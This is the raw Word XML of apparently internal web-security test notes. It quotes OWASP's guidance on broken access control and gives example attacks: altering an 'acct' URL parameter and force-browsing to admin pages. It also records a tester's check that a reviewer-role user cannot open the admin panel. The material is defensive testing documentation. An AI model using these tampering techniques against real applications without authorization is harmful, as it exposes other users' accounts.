          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Json</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p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="7F34BD34" w14:textId="466CB059">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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X-Requested-With: </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</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w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="65AC60B4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> option is only relevant if the "Poll the Specified URL" Verification Strategy has been selected. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="6B0B8DEE" w14:textId="5A9C5F88">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="449E37A7" w:rsidRDefault="55820FFD" w14:paraId="4E29801F" w14:textId="234FDF69">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="56A9857C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TOP 10 OWASP :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="32FB89BC" w14:textId="24A62C2F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="32465999">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A1 – BROKEN ACCESS CONTROL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="12D67BA7" w14:textId="566DD904">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="32465999">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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="679EED9B" w14:textId="78F7EC66">
      <w:pPr>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Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside the user's limits. Common access control vulnerabilities include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="2DA2EC61" w14:textId="40B1B016">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Violation of the principle of least privilege or deny by default, where access should only be granted for particular capabilities, roles, or users, but is available to anyone.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="61F717A0" w14:textId="0F191E4B">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Bypassing access control checks by modifying the URL (parameter tampering or force browsing), internal application state, or the HTML page, or by using an attack tool modifying API requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="7D9EAF97" w14:textId="09AA4B00">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Permitting viewing or editing someone else's account, by providing its unique identifier (insecure direct object references)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="3C027B4E" w14:textId="553A21E4">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Accessing API with missing access controls for POST, PUT and DELETE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="7E00CC21" w14:textId="3EC0F76C">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Elevation of privilege. Acting as a user without being logged in or acting as an admin when logged in as a user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="12D4659F" w14:textId="28CF929C">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Metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token, or a cookie or hidden field manipulated to elevate privileges or abusing JWT invalidation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="06D3A750" w14:textId="09EE41A5">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CORS misconfiguration allows API access from unauthorized/untrusted origins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="6A7BF93D" w14:textId="09C2EE43">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Force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CB83EEC" w:rsidP="449E37A7" w:rsidRDefault="1CB83EEC" w14:paraId="2071ACBB" w14:textId="3F3F0241">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1CB83EEC">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Change the URL’s Id to get the data </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CB83EEC" w:rsidP="449E37A7" w:rsidRDefault="1CB83EEC" w14:paraId="277DD641" w14:textId="5A944D92">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="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1CB83EEC">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E.g: https:dummyexam.com/</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1CB83EEC">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result.php?id</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1CB83EEC">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=12345</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="5A91B791" w14:textId="02AD0847">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="32465999">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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How to Prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="7A0292E6" w14:textId="201A577D">
      <w:pPr>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Access control is only effective in trusted server-side code or server-less API, where the attacker cannot modify the access control check or metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="5BC4640A" w14:textId="19AC7125">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Except for public resources, deny by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="238B2477" w14:textId="760AE60D">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Implement access control mechanisms once and re-use them throughout the application, including minimizing Cross-Origin Resource Sharing (CORS) usage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="37FB66FE" w14:textId="61234D06">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Model access controls should enforce record ownership rather than accepting that the user can create, read, update, or delete any record.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="3D7CA611" w14:textId="16BCCE1B">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Unique application business limit requirements should be enforced by domain models.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="178AD768" w14:textId="407D2135">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Disable web server directory listing and ensure file metadata (e.g., .git) and backup files are not present within web roots.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="65AA8EED" w14:textId="0D787108">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Log access control failures, alert admins when appropriate (e.g., repeated failures).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="204170C2" w14:textId="332C3D91">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Rate limit API and controller access to minimize the harm from automated attack tooling.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="04A0370E" w14:textId="7E88DD7A">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Stateful session identifiers should be invalidated on the server after logout. Stateless JWT tokens should rather be short-lived so that the window of opportunity for an attacker is minimized. For longer lived JWTs </w:t>
      </w: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it's</w:t>
      </w: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highly recommended to follow the OAuth standards to revoke access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="7174FB70" w14:textId="6EA6C42F">
      <w:pPr>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Developers and QA staff should include functional access control unit and integration tests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="11418D8B" w14:textId="69F87738">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="32465999">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="1C3FC08C" w14:textId="180DE04E">
      <w:pPr>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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scenario #1:</w:t>
      </w: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The application uses unverified data in a SQL call that is accessing account information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="520655FE" w14:textId="7C9AAAD2">
      <w:pPr>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pstmt.setString(1, request.getParameter("acct"));</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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ResultSet results = pstmt.executeQuery( );</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="5FA0CE8C" w14:textId="67C2A109">
      <w:pPr>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An attacker simply modifies the browser's 'acct' parameter to send whatever account number they want. If not correctly verified, the attacker can access any user's account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="3F1E14DE" w14:textId="7E49A016">
      <w:pPr>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hyperlink r:id="R80437baf10e84fe8">
        <w:r w:rsidRPr="55820FFD" w:rsidR="32465999">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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https://example.com/app/accountInfo?acct=notmyacct</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="1575C90E" w14:textId="3FF204D5">
      <w:pPr>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55820FFD" w:rsidR="32465999">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scenario #2:</w:t>
      </w:r>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An attacker simply forces browses to target URLs. Admin rights are required for access to the admin page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="55820FFD" w:rsidRDefault="32465999" w14:paraId="5E458618" w14:textId="282701D5">
      <w:pPr>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hyperlink r:id="Rd0255054f4ac40d7">
        <w:r w:rsidRPr="55820FFD" w:rsidR="32465999">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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https://example.com/app/getappInfo</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="55820FFD"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w:t>
      </w:r>
      <w:hyperlink r:id="Rba6e032d40c741e2">
        <w:r w:rsidRPr="55820FFD" w:rsidR="32465999">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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https://example.com/app/admin_getappInfo</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="32465999" w:rsidP="449E37A7" w:rsidRDefault="32465999" w14:paraId="53387606" w14:textId="56DC8A2A">
      <w:pPr>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If an unauthenticated user can access either page, </w:t>
      </w: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it's</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="32465999">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a flaw. If a non-admin can access the admin page, this is a flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D4D3DA8" w:rsidP="449E37A7" w:rsidRDefault="5D4D3DA8" w14:paraId="26A4EC00" w14:textId="5FBEF6FC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5D4D3DA8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E.g</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5D4D3DA8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D4D3DA8" w:rsidP="449E37A7" w:rsidRDefault="5D4D3DA8" w14:paraId="3CA2C853" w14:textId="1E2A3441">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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5D4D3DA8">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The user </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5D4D3DA8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AR-MHS </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="5D4D3DA8">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has only Admin Reviewer role </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43273F7C" w:rsidP="449E37A7" w:rsidRDefault="43273F7C" w14:paraId="3322E626" w14:textId="5E660940">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="43273F7C">
        <w:drawing>
          <wp:inline wp14:editId="0CE1A712" wp14:anchorId="78BEA413">
            <wp:extent cx="3867150" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1718391018" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rcb8636bcc5d543e4">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3867150" cy="695325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="3A08A104" w14:textId="1D193CE1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="43273F7C" w:rsidP="449E37A7" w:rsidRDefault="43273F7C" w14:paraId="4B0CC56E" w14:textId="5DF7D810">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="43273F7C">
        <w:drawing>
          <wp:inline wp14:editId="2BBCA693" wp14:anchorId="434A3EC4">
            <wp:extent cx="4572000" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1724105289" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rd9416a8415ce4e59">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w:rsidR="43273F7C" w:rsidP="449E37A7" w:rsidRDefault="43273F7C" w14:paraId="52CD68FC" w14:textId="7AF7B3EC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="43273F7C">
        <w:rPr/>
        <w:t>Currently login user has only Admin Reviewer role cannot access the Admin Panel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43273F7C" w:rsidP="449E37A7" w:rsidRDefault="43273F7C" w14:paraId="53881476" w14:textId="15CC1872">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="43273F7C">
        <w:drawing>
          <wp:inline wp14:editId="51930BCF" wp14:anchorId="09A46B24">
            <wp:extent cx="4572000" cy="1438275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1301473422" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R698996b07a73497d">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1438275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="3886801F" w:rsidP="449E37A7" w:rsidRDefault="3886801F" w14:paraId="097AB1F9" w14:textId="219F0E59">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="3886801F">
        <w:rPr/>
        <w:t xml:space="preserve">Below page can access only the user who has Owner Role </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2204F01C" w:rsidP="449E37A7" w:rsidRDefault="2204F01C" w14:paraId="28E05EF2" w14:textId="671B177A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="2204F01C">
        <w:rPr/>
        <w:t xml:space="preserve">Copy paste URL </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="502090BD" w:rsidP="449E37A7" w:rsidRDefault="502090BD" w14:paraId="713F2B26" w14:textId="6092A8C8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="502090BD">
        <w:drawing>
          <wp:inline wp14:editId="67B8FBFB" wp14:anchorId="06767B0A">
            <wp:extent cx="4572000" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1355327378" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3c8fac0ca0c7446e">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="609600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="7CA9D322" w14:textId="4E36FB4C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="502090BD" w:rsidP="449E37A7" w:rsidRDefault="502090BD" w14:paraId="53F452FC" w14:textId="21F0C65E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidR="502090BD">
        <w:drawing>
          <wp:inline wp14:editId="5EDFBCFA" wp14:anchorId="4D84E7C4">
            <wp:extent cx="4572000" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121546431" name="" title=""/>
